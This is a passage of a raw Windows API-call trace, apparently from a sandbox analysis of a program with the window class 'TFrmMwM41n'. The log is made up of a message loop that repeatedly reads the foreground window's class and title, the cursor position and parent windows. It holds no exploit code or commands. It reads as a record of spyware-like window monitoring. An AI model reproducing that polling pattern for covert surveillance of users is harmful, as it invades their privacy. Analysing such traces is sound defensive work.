0x4f0 [0040.727] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.727] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0040.727] GetParent (hWnd=0x10038) returned 0x0 [0040.727] IsWindowVisible (hWnd=0x10166) returned 1 [0040.727] IsWindowEnabled (hWnd=0x10166) returned 1 [0040.727] GetCurrentThreadId () returned 0xc04 [0040.728] ResetEvent (hEvent=0xb2c) returned 1 [0040.728] GetCurrentThreadId () returned 0xc04 [0040.728] GetCurrentThreadId () returned 0xc04 [0040.728] GetCurrentThreadId () returned 0xc04 [0040.728] WaitMessage () returned 1 [0041.193] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0041.193] IsWindowUnicode (hWnd=0x40148) returned 1 [0041.193] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0041.193] GetCapture () returned 0x0 [0041.193] GetWindowThreadProcessId (in: hWnd=0x40148, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0041.193] GetCurrentProcessId () returned 0x4f0 [0041.193] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.193] GetPropW (hWnd=0x40148, lpString=0xc031) returned 0x0 [0041.193] GetParent (hWnd=0x40148) returned 0x0 [0041.193] TranslateMessage (lpMsg=0x68ff884) returned 0 [0041.193] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0041.193] GetForegroundWindow () returned 0x10166 [0041.193] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0041.193] GetWindowTextW (in: hWnd=0x10166, lpString=0x68ff4f0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0041.193] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0041.193] GetCurrentThreadId () returned 0xc04 [0041.193] GetCurrentThreadId () returned 0xc04 [0041.193] GetCurrentThreadId () returned 0xc04 [0041.193] GetCurrentThreadId () returned 0xc04 [0041.193] GetCurrentThreadId () returned 0xc04 [0041.194] GetCurrentThreadId () returned 0xc04 [0041.194] GetLocalTime (in: lpSystemTime=0x68ff314 | out: lpSystemTime=0x68ff314*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0x9, wMinute=0x38, wSecond=0x3, wMilliseconds=0x377)) [0041.194] InvalidateRect (hWnd=0x10166, lpRect=0x68ff18c, bErase=1) returned 1 [0041.194] GetDC (hWnd=0x0) returned 0x20010728 [0041.194] MoveToEx (in: hdc=0x20010728, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0041.194] SelectObject (hdc=0x20010728, h=0x130a01ce) returned 0x18a002e [0041.194] GetSysColor (nIndex=8) returned 0x0 [0041.194] SetTextColor (hdc=0x20010728, color=0x0) returned 0x0 [0041.194] SelectObject (hdc=0x20010728, h=0x1f3001b7) returned 0x1b00017 [0041.194] SetROP2 (hdc=0x20010728, rop2=13) returned 13 [0041.194] UnrealizeObject (h=0x17100741) returned 1 [0041.194] SelectObject (hdc=0x20010728, h=0x17100741) returned 0x1900010 [0041.194] SetBkColor (hdc=0x20010728, color=0xffffff) returned 0xffffff [0041.194] SetBkMode (hdc=0x20010728, mode=2) returned 2 [0041.194] GetSysColor (nIndex=8) returned 0x0 [0041.194] GetSysColor (nIndex=14) returned 0xffffff [0041.194] DrawThemeTextEx () returned 0x0 [0041.194] SelectObject (hdc=0x20010728, h=0x1b00017) returned 0x1f3001b7 [0041.194] SelectObject (hdc=0x20010728, h=0x1900015) returned 0x17100741 [0041.194] SelectObject (hdc=0x20010728, h=0x18a002e) returned 0x130a01ce [0041.194] GetCurrentPositionEx (in: hdc=0x20010728, lppt=0x68ff15c | out: lppt=0x68ff15c) returned 1 [0041.195] ReleaseDC (hWnd=0x0, hDC=0x20010728) returned 1 [0041.195] InvalidateRect (hWnd=0x10166, lpRect=0x68ff148, bErase=1) returned 1 [0041.195] InvalidateRect (hWnd=0x10166, lpRect=0x68ff144, bErase=1) returned 1 [0041.195] IsIconic (hWnd=0x10166) returned 0 [0041.195] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff140 | out: lpRect=0x68ff140) returned 1 [0041.195] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0041.195] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0041.195] WindowFromPoint (Point=0x3df) returned 0x10070 [0041.195] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0041.195] GetCurrentProcessId () returned 0x4f0 [0041.195] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.195] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0041.195] GetParent (hWnd=0x10070) returned 0x1006e [0041.195] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0041.195] GetCurrentProcessId () returned 0x4f0 [0041.195] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.195] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0041.195] GetParent (hWnd=0x1006e) returned 0x10068 [0041.195] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0041.195] GetCurrentProcessId () returned 0x4f0 [0041.195] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.195] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0041.196] GetParent (hWnd=0x10068) returned 0x10038 [0041.196] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0041.196] GetCurrentProcessId () returned 0x4f0 [0041.196] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.196] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0041.196] GetParent (hWnd=0x10038) returned 0x0 [0041.196] IsWindowVisible (hWnd=0x10166) returned 1 [0041.196] IsWindowEnabled (hWnd=0x10166) returned 1 [0041.196] GetCurrentThreadId () returned 0xc04 [0041.196] ResetEvent (hEvent=0xb2c) returned 1 [0041.196] GetCurrentThreadId () returned 0xc04 [0041.196] GetCurrentThreadId () returned 0xc04 [0041.196] GetCurrentThreadId () returned 0xc04 [0041.196] WaitMessage () returned 1 [0041.707] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0041.707] IsWindowUnicode (hWnd=0x30150) returned 1 [0041.708] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0041.708] GetCapture () returned 0x0 [0041.708] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0041.708] GetCurrentProcessId () returned 0x4f0 [0041.708] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.708] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0041.708] GetParent (hWnd=0x30150) returned 0x0 [0041.708] TranslateMessage (lpMsg=0x68ff884) returned 0 [0041.708] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0041.708] GetForegroundWindow () returned 0x10166 [0041.708] SendMessageW (hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0041.708] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0041.708] GetCurrentThreadId () returned 0xc04 [0041.708] GetCurrentThreadId () returned 0xc04 [0041.708] GetCurrentThreadId () returned 0xc04 [0041.708] GetCurrentThreadId () returned 0xc04 [0041.708] GetCurrentThreadId () returned 0xc04 [0041.708] GetCurrentThreadId () returned 0xc04 [0041.708] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0041.708] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0041.708] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0041.708] WindowFromPoint (Point=0x3df) returned 0x10070 [0041.708] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0041.709] GetCurrentProcessId () returned 0x4f0 [0041.709] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.709] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0041.709] GetParent (hWnd=0x10070) returned 0x1006e [0041.709] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0041.709] GetCurrentProcessId () returned 0x4f0 [0041.709] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.709] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0041.709] GetParent (hWnd=0x1006e) returned 0x10068 [0041.709] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0041.709] GetCurrentProcessId () returned 0x4f0 [0041.709] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.709] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0041.709] GetParent (hWnd=0x10068) returned 0x10038 [0041.709] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0041.709] GetCurrentProcessId () returned 0x4f0 [0041.709] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0041.709] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0041.709] GetParent (hWnd=0x10038) returned 0x0 [0041.709] IsWindowVisible (hWnd=0x10166) returned 1 [0041.709] IsWindowEnabled (hWnd=0x10166) returned 1 [0041.709] GetCurrentThreadId () returned 0xc04 [0041.709] ResetEvent (hEvent=0xb2c) returned 1 [0041.709] GetCurrentThreadId () returned 0xc04 [0041.709] GetCurrentThreadId () returned 0xc04 [0041.710] GetCurrentThreadId () returned 0xc04 [0041.710] WaitMessage () returned 1 [0042.706] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0042.706] IsWindowUnicode (hWnd=0x40148) returned 1 [0042.706] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0042.706] GetCapture () returned 0x0 [0042.706] GetWindowThreadProcessId (in: hWnd=0x40148, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0042.706] GetCurrentProcessId () returned 0x4f0 [0042.706] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.706] GetPropW (hWnd=0x40148, lpString=0xc031) returned 0x0 [0042.706] GetParent (hWnd=0x40148) returned 0x0 [0042.706] TranslateMessage (lpMsg=0x68ff884) returned 0 [0042.706] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0042.706] GetForegroundWindow () returned 0x10166 [0042.706] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0042.706] GetWindowTextW (in: hWnd=0x10166, lpString=0x68ff4f0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0042.706] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0042.706] GetCurrentThreadId () returned 0xc04 [0042.706] GetCurrentThreadId () returned 0xc04 [0042.706] GetCurrentThreadId () returned 0xc04 [0042.707] GetCurrentThreadId () returned 0xc04 [0042.707] GetCurrentThreadId () returned 0xc04 [0042.707] GetCurrentThreadId () returned 0xc04 [0042.707] GetLocalTime (in: lpSystemTime=0x68ff314 | out: lpSystemTime=0x68ff314*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0x9, wMinute=0x38, wSecond=0x5, wMilliseconds=0x190)) [0042.707] InvalidateRect (hWnd=0x10166, lpRect=0x68ff18c, bErase=1) returned 1 [0042.707] GetDC (hWnd=0x0) returned 0x20010728 [0042.707] MoveToEx (in: hdc=0x20010728, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0042.707] SelectObject (hdc=0x20010728, h=0x130a01ce) returned 0x18a002e [0042.707] GetSysColor (nIndex=8) returned 0x0 [0042.707] SetTextColor (hdc=0x20010728, color=0x0) returned 0x0 [0042.707] SelectObject (hdc=0x20010728, h=0x1f3001b7) returned 0x1b00017 [0042.707] SetROP2 (hdc=0x20010728, rop2=13) returned 13 [0042.707] UnrealizeObject (h=0x17100741) returned 1 [0042.707] SelectObject (hdc=0x20010728, h=0x17100741) returned 0x1900010 [0042.707] SetBkColor (hdc=0x20010728, color=0xffffff) returned 0xffffff [0042.707] SetBkMode (hdc=0x20010728, mode=2) returned 2 [0042.707] GetSysColor (nIndex=8) returned 0x0 [0042.707] GetSysColor (nIndex=14) returned 0xffffff [0042.707] DrawThemeTextEx () returned 0x0 [0042.707] SelectObject (hdc=0x20010728, h=0x1b00017) returned 0x1f3001b7 [0042.707] SelectObject (hdc=0x20010728, h=0x1900015) returned 0x17100741 [0042.707] SelectObject (hdc=0x20010728, h=0x18a002e) returned 0x130a01ce [0042.707] GetCurrentPositionEx (in: hdc=0x20010728, lppt=0x68ff15c | out: lppt=0x68ff15c) returned 1 [0042.708] ReleaseDC (hWnd=0x0, hDC=0x20010728) returned 1 [0042.708] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0042.708] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0042.708] WindowFromPoint (Point=0x3df) returned 0x10070 [0042.708] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0042.708] GetCurrentProcessId () returned 0x4f0 [0042.708] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.708] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0042.708] GetParent (hWnd=0x10070) returned 0x1006e [0042.708] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0042.708] GetCurrentProcessId () returned 0x4f0 [0042.708] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.708] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0042.708] GetParent (hWnd=0x1006e) returned 0x10068 [0042.708] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0042.708] GetCurrentProcessId () returned 0x4f0 [0042.708] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.708] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0042.708] GetParent (hWnd=0x10068) returned 0x10038 [0042.708] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0042.708] GetCurrentProcessId () returned 0x4f0 [0042.708] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.708] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0042.708] GetParent (hWnd=0x10038) returned 0x0 [0042.709] IsWindowVisible (hWnd=0x10166) returned 1 [0042.709] IsWindowEnabled (hWnd=0x10166) returned 1 [0042.709] GetCurrentThreadId () returned 0xc04 [0042.709] ResetEvent (hEvent=0xb2c) returned 1 [0042.709] GetCurrentThreadId () returned 0xc04 [0042.709] GetCurrentThreadId () returned 0xc04 [0042.709] GetCurrentThreadId () returned 0xc04 [0042.709] WaitMessage () returned 1 [0042.721] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0042.721] IsWindowUnicode (hWnd=0x30150) returned 1 [0042.721] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0042.721] GetCapture () returned 0x0 [0042.721] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0042.721] GetCurrentProcessId () returned 0x4f0 [0042.722] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.722] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0042.722] GetParent (hWnd=0x30150) returned 0x0 [0042.722] TranslateMessage (lpMsg=0x68ff884) returned 0 [0042.722] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0042.722] GetForegroundWindow () returned 0x10038 [0042.722] SendMessageW (hWnd=0x10038, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x0 [0042.722] GetClassNameW (in: hWnd=0x10038, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="Shell_TrayWnd") returned 13 [0042.722] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0042.722] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0042.722] WindowFromPoint (Point=0x3df) returned 0x10070 [0042.722] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0042.722] GetCurrentProcessId () returned 0x4f0 [0042.722] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.722] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0042.722] GetParent (hWnd=0x10070) returned 0x1006e [0042.723] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0042.723] GetCurrentProcessId () returned 0x4f0 [0042.723] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.723] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0042.723] GetParent (hWnd=0x1006e) returned 0x10068 [0042.723] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0042.723] GetCurrentProcessId () returned 0x4f0 [0042.723] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.723] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0042.723] GetParent (hWnd=0x10068) returned 0x10038 [0042.723] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0042.723] GetCurrentProcessId () returned 0x4f0 [0042.723] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0042.723] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0042.723] GetParent (hWnd=0x10038) returned 0x0 [0042.723] IsWindowVisible (hWnd=0x10166) returned 1 [0042.723] IsWindowEnabled (hWnd=0x10166) returned 1 [0042.723] GetCurrentThreadId () returned 0xc04 [0042.723] ResetEvent (hEvent=0xb2c) returned 1 [0042.723] GetCurrentThreadId () returned 0xc04 [0042.723] GetCurrentThreadId () returned 0xc04 [0042.723] GetCurrentThreadId () returned 0xc04 [0042.723] WaitMessage () returned 1 [0043.735] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0043.735] IsWindowUnicode (hWnd=0x30150) returned 1 [0043.735] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0043.736] GetCapture () returned 0x0 [0043.736] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0043.736] GetCurrentProcessId () returned 0x4f0 [0043.736] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0043.736] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0043.736] GetParent (hWnd=0x30150) returned 0x0 [0043.736] TranslateMessage (lpMsg=0x68ff884) returned 0 [0043.736] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0043.736] GetForegroundWindow () returned 0x10166 [0043.736] SendMessageW (hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0043.736] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0043.736] GetCurrentThreadId () returned 0xc04 [0043.736] GetCurrentThreadId () returned 0xc04 [0043.736] GetCurrentThreadId () returned 0xc04 [0043.736] GetCurrentThreadId () returned 0xc04 [0043.736] GetCurrentThreadId () returned 0xc04 [0043.736] GetCurrentThreadId () returned 0xc04 [0043.736] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0043.736] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0043.736] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0043.736] WindowFromPoint (Point=0x466) returned 0x100d0 [0043.736] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0043.737] GetCurrentProcessId () returned 0x4f0 [0043.737] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0043.737] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0043.737] GetParent (hWnd=0x100d0) returned 0x100ce [0043.737] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0043.737] GetCurrentProcessId () returned 0x4f0 [0043.737] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0043.737] GetPropW (hWnd=0x100ce, lpString=0xc031) returned 0x0 [0043.737] GetParent (hWnd=0x100ce) returned 0x100ca [0043.737] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0043.737] GetCurrentProcessId () returned 0x4f0 [0043.737] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0043.737] GetPropW (hWnd=0x100ca, lpString=0xc031) returned 0x0 [0043.737] GetParent (hWnd=0x100ca) returned 0x0 [0043.737] IsWindowVisible (hWnd=0x10166) returned 1 [0043.737] IsWindowEnabled (hWnd=0x10166) returned 1 [0043.737] GetCurrentThreadId () returned 0xc04 [0043.737] ResetEvent (hEvent=0xb2c) returned 1 [0043.737] GetCurrentThreadId () returned 0xc04 [0043.737] GetCurrentThreadId () returned 0xc04 [0043.737] GetCurrentThreadId () returned 0xc04 [0043.737] WaitMessage () returned 1 [0044.219] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0044.219] IsWindowUnicode (hWnd=0x40148) returned 1 [0044.219] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0044.219] GetCapture () returned 0x0 [0044.220] GetWindowThreadProcessId (in: hWnd=0x40148, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0044.220] GetCurrentProcessId () returned 0x4f0 [0044.220] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0044.220] GetPropW (hWnd=0x40148, lpString=0xc031) returned 0x0 [0044.220] GetParent (hWnd=0x40148) returned 0x0 [0044.220] TranslateMessage (lpMsg=0x68ff884) returned 0 [0044.220] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0044.220] GetForegroundWindow () returned 0x10166 [0044.220] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0044.220] GetWindowTextW (in: hWnd=0x10166, lpString=0x68ff4f0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0044.220] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0044.221] GetCurrentThreadId () returned 0xc04 [0044.221] GetCurrentThreadId () returned 0xc04 [0044.221] GetCurrentThreadId () returned 0xc04 [0044.221] GetCurrentThreadId () returned 0xc04 [0044.221] GetCurrentThreadId () returned 0xc04 [0044.221] GetCurrentThreadId () returned 0xc04 [0044.221] GetLocalTime (in: lpSystemTime=0x68ff314 | out: lpSystemTime=0x68ff314*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0x9, wMinute=0x38, wSecond=0x6, wMilliseconds=0x391)) [0044.221] InvalidateRect (hWnd=0x10166, lpRect=0x68ff18c, bErase=1) returned 1 [0044.221] GetDC (hWnd=0x0) returned 0x20010728 [0044.221] MoveToEx (in: hdc=0x20010728, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0044.221] SelectObject (hdc=0x20010728, h=0x130a01ce) returned 0x18a002e [0044.222] GetSysColor (nIndex=8) returned 0x0 [0044.222] SetTextColor (hdc=0x20010728, color=0x0) returned 0x0 [0044.222] SelectObject (hdc=0x20010728, h=0x1f3001b7) returned 0x1b00017 [0044.222] SetROP2 (hdc=0x20010728, rop2=13) returned 13 [0044.222] UnrealizeObject (h=0x17100741) returned 1 [0044.222] SelectObject (hdc=0x20010728, h=0x17100741) returned 0x1900010 [0044.222] SetBkColor (hdc=0x20010728, color=0xffffff) returned 0xffffff [0044.222] SetBkMode (hdc=0x20010728, mode=2) returned 2 [0044.222] GetSysColor (nIndex=8) returned 0x0 [0044.222] GetSysColor (nIndex=14) returned 0xffffff [0044.222] DrawThemeTextEx () returned 0x0 [0044.222] SelectObject (hdc=0x20010728, h=0x1b00017) returned 0x1f3001b7 [0044.222] SelectObject (hdc=0x20010728, h=0x1900015) returned 0x17100741 [0044.222] SelectObject (hdc=0x20010728, h=0x18a002e) returned 0x130a01ce [0044.222] GetCurrentPositionEx (in: hdc=0x20010728, lppt=0x68ff15c | out: lppt=0x68ff15c) returned 1 [0044.222] ReleaseDC (hWnd=0x0, hDC=0x20010728) returned 1 [0044.223] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0044.223] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=1126, y=518)) returned 1 [0044.223] WindowFromPoint (Point=0x466) returned 0x100d0 [0044.223] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0044.223] GetCurrentProcessId () returned 0x4f0 [0044.223] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0044.223] GetPropW (hWnd=0x100d0, lpString=0xc031) returned 0x0 [0044.223] GetParent (hWnd=0x100d0) returned 0x100ce [0044.223] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x4f4 [0044.223] GetCurrentProcessId () returned 0x4f0 [0044.223] GlobalFindAtomW 